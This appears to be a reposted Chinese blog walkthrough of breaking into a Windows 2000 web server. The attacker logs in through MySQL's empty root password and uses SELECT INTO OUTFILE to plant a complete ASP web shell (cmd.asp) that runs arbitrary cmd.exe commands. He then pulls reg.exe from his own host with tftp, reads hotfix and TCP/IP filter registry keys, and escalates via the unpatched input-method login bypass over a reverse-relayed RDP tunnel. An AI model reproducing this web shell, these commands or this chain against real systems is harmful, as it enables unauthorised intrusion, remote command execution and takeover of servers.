http://www.target.net/ 　　Ok!先用nmap掃描一下，掃描結果如下： 　　25/tcp open smtp 　　53/tcp open domain 　　80/tcp open http 　　110/tcp open pop-3 　　389/tcp open ldap 　　1002/tcp open unknown 　　3306/tcp open mysql 　　然后從IIS版本判斷目標是windows 2000服務器。從開放的端口來看，它要么是安裝了防火墻，要么是做了TCP/IP過濾，呵呵，比abc.target.net有意思多了。從25和110端口返回的數據來看，他們用的郵件服務器是IMail 6.04，沒什么可利用的。IIS上面網管做了安全配置，一些默認的CGI漏洞也沒有，這也沒什么好利用的。只剩下最后一個端口了，習慣性的用我的mysql客戶端連接試試：
　F:cmd〉mysql -u root -h http://www.target.net/ 　　Welcome to the MySQL monitor. Commands end with ; or g. 　　Your MySQL connection id is 3038 to server version: 3.23.21-beta 　　Type 'help;' or 'h' for help. Type 'c' to clear the buffer 　　mysql〉 　　呵呵，不好意思，看來網管沒有給mysql帳號root設置一個密碼，是默認的空密碼，那么我們就可以利用這個漏洞來做點什么了。如果是MS-SQL數據庫的話就好辦啦，直接可以用xp_cmdshell來運行系統命令，但是可惜的是mysql沒有類似MS-SQL那樣的擴展存儲過程。 　　現在我們可以利用這個漏洞來做三件事情： 〈1〉搜索mysql數據庫里面的內容，看能不能找出一些有用的敏感信息，我找了一會兒就不想找了，呵呵 〈2〉讀取服務器上的任何文件，當然前提是知道文件的物理路徑 〈3〉以啟動mysql服務用戶的權限往服務器上寫文件，前提是這個文件要不存在的，就是說不能覆蓋文件 　　如果我們知道IIS主目錄的物理路徑的話,我們就可以往上面寫一個ASP上去，然后通過IE來執行系統命令。怎么得到IIS目錄的物理路徑呢？天知道！ 　　沒辦法，猜吧。。。。。。先在mysql默認數據庫test中建一個表tmp，這個表只有一個字段str,類型為TEXT, 　　mysql〉 use test;create table tmp（str TEXT）; 　　Database changed 　　Query OK, 0 rows affected （0.05 sec） 　　然后憑著自己做網管的直覺，開始猜測IIS主目錄的物理路徑，c:inetpubwwwroot，c:www，c:wwwroot，c:inetpubweb,d:web，d:wwwroot，都不對，55555。大概猜測到第10次，我的mysql客戶端回顯信息如下： mysql〉 load data infile "d:wwwgbaboutabout.htm" into table tmp; Query OK, 235 rows affected （0.05 sec） Records: 235 Deleted: 0 Skipped: 0 Warnings: 0 　　哈哈哈，猜中了，IIS主目錄的物理路徑是d:www，因為上面的文件的虛擬路徑是http://www.target.net/gb/about/about.htm，看來我得到一個shell了，呵呵。 　　接下來我們就可以往d:wwwgbabout里面寫一個ASP文件進去，然后通過http://www.target.net/gb/about/cmd.asp來執行系統命令了。然后在網上找來一個現成的cmd.asp，懶的自己去寫了：）。Cmd.asp如下： -------------------------------cmd.asp---------------------------------------- 〈% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject（""WSCRIPT.SHELL""） Set oScriptNet = Server.CreateObject（""WSCRIPT.NETWORK""） Set oFileSys = Server.CreateObject（""Scripting.FileSystemObject""） szCMD = Request.Form（"".CMD""） If （szCMD 〈〉 """"） Then szTempFile = ""C:" & oFileSys.GetTempName（） Call oScript.Run （""cmd.exe /c "" & szCMD & "" 〉 "" & szTempFile, 0, True） Set oFile = oFileSys.OpenTextFile （szTempFile, 1, False, 0） End If %〉 〈HTML〉〈BODY〉〈FORM action=""〈%= Request.ServerVariables（""URL""） %〉"" method=""POST""〉 〈input type=text name="".CMD"" size=45 value=""〈%= szCMD %〉""〉〈input type=submit value=""Run""〉〈/FORM〉〈PRE〉 〈% If （IsObject（oFile）） Then On Error Resume Next Response.Write Server.HTMLEncode（oFile.ReadAll） oFile.Close Call oFileSys.DeleteFile（szTempFile, True） End If%〉 〈/BODY〉〈/HTML〉 ----------------------------end of cmd.asp----------------------------------- 　　由于往mysql數據庫中插入數據的時候，會過濾特殊字符什么的，例如雙引號之類的，特別麻煩。各位留意沒有，上面的ASP語句中，都是兩個雙引號一起的，這樣才能寫進去，原來是一個雙引號的。然后我在數據庫中再建一個表： mysql〉 use test;create table cmd（str TEXT）; Database changed Query OK, 0 rows affected （0.05 sec） 　　然后用如下語句，一句一句把上面的ASP寫進去: mysql〉 insert into cmd values（"一行一行的asp代碼，呵呵"）; 　　為什么不全部一起寫進去呢？呵呵，換行后，一會兒導出的文件就會有特殊字符了，asp就不能正常運行了，只能辛苦點一行一行寫了。然后把asp文件導到服務器上： mysql〉select * from cmd into outfile "d:wwwgbaboucmd.asp"; 　　然后把我們剛才建的表都刪除掉： mysql〉 use test; drop table tmp; drop table cmd; 　　ok!我們得到一個shell了，雖然權限不高，但畢竟已經向取得admin權限邁出一大步了，不是嗎，呵呵。做這個asp文件可花了我不少時間哦。現在我們利用這個shell來收集系統信息，嘗試取得admin權限。 〈1〉先看一下系統文件權限設置如何： c: Everyone:（OI）（CI）F d: xxx:（OI）（CI）（DENY）（特殊訪問:） DELETE READ_CONTROL WRITE_DAC WRITE_OWNER STANDARD_RIGHTS_REQUIRED FILE_READ_DATA FILE_WRITE_DATA FILE_APPEND_DATA FILE_READ_EA FILE_WRITE_EA FILE_EXECUTE FILE_DELETE_CHILD FILE_READ_ATTRIBUTES FILE_WRITE_ATTRIBUTES Everyone:（OI）（CI）F 　　看來我們現在就可以讀寫硬盤上的任何文件了，現在就可以改他的首頁了，但這樣做沒意思，對不對，我們的目標是取得admin權限，呵呵。 〈2〉然后搜索一下硬盤上都有些什么文件： c:Program Files 的目錄下有兩個比較有意思的文件， 2000-12-19 13:10 　Serv-U 2001-01-20 22:43 綠色警戒 把Serv-U里面的用戶和密碼讀出來看看后，沒有什么用處，然后進入綠色警戒目錄看看，呵呵，除了log外，什么都沒有，呵呵。 〈3〉再看看都有哪些用戶： Guest IUSR_SERVER_1 IUSR_SERVER-2 IWAM_SERVER_1 IWAM_SERVER-2 ceo[他們CEO的帳號J] TsInternetUser 　　管理員有ceo 和targetDomain Admins，看來這臺機器是他們域中的一臺服務器。開始本來想給ceo下一個套，在他的啟動目錄里放一個程序，但后來看到這個帳號已經幾個月沒登陸了，就放棄了。 〈4〉看看啟動了那些服務，這幾個比較有意思, 看來都是默認的： Task Scheduler Simple Mail Transport Protocol （SMTP） Task Scheduler 〈5〉看看網絡狀況，這幾個比較有意思： TCP 0.0.0.0:21 0.0.0.0:0 LISTENING TCP 0.0.0.0:119 0.0.0.0:0 LISTENING TCP 192.168.1.3:3389 0.0.0.0:0 LISTENING 　　看來有TermService，不過在網卡上做了TCP/IP過濾，只對內網開放，那么我們就來 〈6〉看看網卡設置信息： Ethernet adapter 本地連接: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Realtek RTL8139（A） PCI Fast Ethernet Adapter Physical Address. . . . . . . . . : 00-E0-4C-68-C4-B2 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.1.3 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : Ethernet adapter 本地連接 2: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Realtek RTL8139（A） PCI Fast Ethernet Adapter#2 Physical Address. . . . . . . . . : 00-E0-4C-68-B8-FC DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . :xxx Subnet Mask . . . . . . . . . . . : Default Gateway . . . . . . . . . : 　　經過上面的一些步驟，對這臺服務器的設置情況就有了一個大概的了解。如何取得admin權限？netdde?pipeupadmin?呵呵，無法利用，沒有可利用的可以登陸的用戶。下套？等到什么時候，呵呵。 　　Okok!讓我們來看看這個系統都打了些什么補丁。怎么查看？呵呵，打了補丁后，信息都會存貯在注冊表中，查詢注冊表中的這個鍵值就行了："HKLMSoftwareMicrosoftWindows NTCurrentVersionhotfix"，這樣的話，我們得上傳一個reg.exe[M$ Resource Kit中的命令行注冊表編輯器]到服務器里面，我們才能操作他的注冊表。開始我想用先寫一個ftp腳本，然后ftp -s:cmd.txt讓他到我的服務器來下載，但結果失敗了，后來才想起他做了TCP/IP過濾，5555，我記性真不好。怎么辦呢？有辦法，用tftp來傳輸。我先在我的服務器上安裝了一個Cisco TFTP Server，然后在目標機器上運行tftp -I http://www.eyas.org/ GET reg.exe，呵呵，傳輸過去咯。然后運行 REG QUERY "HKLMSoftwareMicrosoftWindows NTCurrentVersionhotfix" 　　返回數據如下： Listing of [SoftwareMicrosoftWindows NTCurrentVersionhotfix] [Q147222]==〉這個不知道是什么東西，好象默認2k機器上都有 [Q269862]==〉Q269862_W2K_SP2_x86_CN.EXE==〉Microsoft IIS Unicode解碼目錄遍歷漏洞! [Q277873]==〉Q277873_W2K_sp2_x86_CN.EXE==〉Microsoft IIS CGI文件名檢查漏洞! 　　呵呵，==〉和后面的說明是我加上去的，不是注冊表中的。看來管理員不太勤快啊，只打了兩個補丁。 　　哈哈！到了這一步，大家想到怎么取得admin權限了嗎？呵呵，你一定也想到了，他的機器開了TermService服務，但windows2000登陸驗證可被繞過的漏洞沒有安裝補丁，此補丁為Q270676_W2K_SP2_x86_CN.EXE。由此看來，管理員只是刪除了幫助法文件，而沒有打補丁。用dir c:winnthelpwin*驗證一下，果然沒有熟悉的輸入法幫助文件。敵人沒有輸入法，我們幫他造，hoho~~別忘了我們可以往任何地方寫文件哦。 　　嘻嘻，咱們也別高興的太早了，別忘了他的機器做了TCP/IP過濾哦，我們是沒有辦法連接到他的3389端口的。不要著急，不要著急，讓我們先來看看他的TCP/IP過濾的設置情況。怎么看呢？老辦法，查看注冊表里面的鍵值啦。用剛才的reg.exe查詢 〈1〉reg QUERY "HKLMSystemCurrentControlSetServicesTcpipParametersInterfaces" Listing of [SystemCurrentControlSetServicesTcpipParametersInterfaces] [{4B41CFFB-4A20-42F8-9087-A89FE71FD8F4}] [{612A3142-DB85-4D4E-8028-81A9EB4D6A51}] 〈2〉reg QUERY "HKLMSystemCurrentControlSetServicesTcpipParametersInterfaces {4B41CFFB-4A20-42F8-9087-A89FE71FD8F4}" Listing of [SystemCurrentControlSetServicesTcpipParametersInterfaces {4B41CFFB-4A20-42F8-9087-A89FE71FD8F4}] MULTI_SZ IPAddress ; MULTI_SZ TCPAllowedPorts 25;53;80;110;3306; MULTI_SZ UDPAllowedPorts 0; MULTI_SZ RawIPAllowedProtocols 0; 〈3〉reg QUERY "HKLMSystemCurrentControlSetServicesTcpipParametersInterfaces {612A3142-DB85-4D4E-8028-81A9EB4D6A51}" Listing of [SystemCurrentControlSetServicesTcpipParametersInterfaces {612A3142-DB85-4D4E-8028-81A9EB4D6A51}] MULTI_SZ IPAddress 192.168.1.3; MULTI_SZ TCPAllowedPorts 0; MULTI_SZ UDPAllowedPorts 0; MULTI_SZ RawIPAllowedProtocols 0; 　　篇幅關系，我過濾了一些輸出。第二次查詢的是外網網卡，我們可以得知只開放了TCP 25，53，80，110，3306，UDP全部，IP協議全部。第三次查詢的是內網網卡，沒有任何限制。 現在我們可以把輸入法幫助文件上傳到他的c:winnthelp目錄下去，然后如果能連接到他的3389端口的話，我們就可以得到admin權限了。問題的關鍵是外網網卡做了TCP/IP限制。55555，怎么辦呢？如何突破？有辦法！我們可以利用socket轉發和反彈端口技術，照樣可以連接到敵人的TermService！ 具體過程如下： 〈1〉在我的另一臺服務器www.eyas2.org[我稱他為AgentMaster]上運行一個程序，監聽3389端口[等待我的TermClient去連接]，監聽11111端口[等待www.target.net來連接]，當然了，第2個端口可以隨便選，第1個端口選其他的話，就要相應的修改TermClient，比較麻煩 〈2〉在www.target.net[我稱他為AgentSlave]運行另外一個程序， 先連接到www.eyas2.org:11111，再連接到192.168.1.3:3389[敵人服務器內網的IP] 〈3〉 我的TermClient連接到www.eyas2.org:3389，這樣，數據通道就全部建立好了。接下來，兩個程序就忠實的為我們轉發數據了。 注意：www.eyas2.org和www.eyas.org可以為同一臺服務器，但要保證www.target.net能connect上你的服務器。192.168.1.3也可以換為他內網的任何一個IP。這樣，當我用TermClient連接到www.eyas2.org的時候，其實是連接到www.target.net。當熟悉的登陸界面出現在我面前，我熟練的調出輸入法，取得admin權限，呵呵，心里還有那么一點點成就感！ 非常感謝痞菜兄提供 -------------------------------------------------------------------------------- 所有文章版權歸原作者所有，如許轉載請聯系原作者，并注明出處--- Orange Hacker

轉載于:https://blog.51cto.com/zzkch/2252

總結

以上是生活随笔為你收集整理的对于***win2000 精彩过程实例！不可错过_出自：痞菜的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。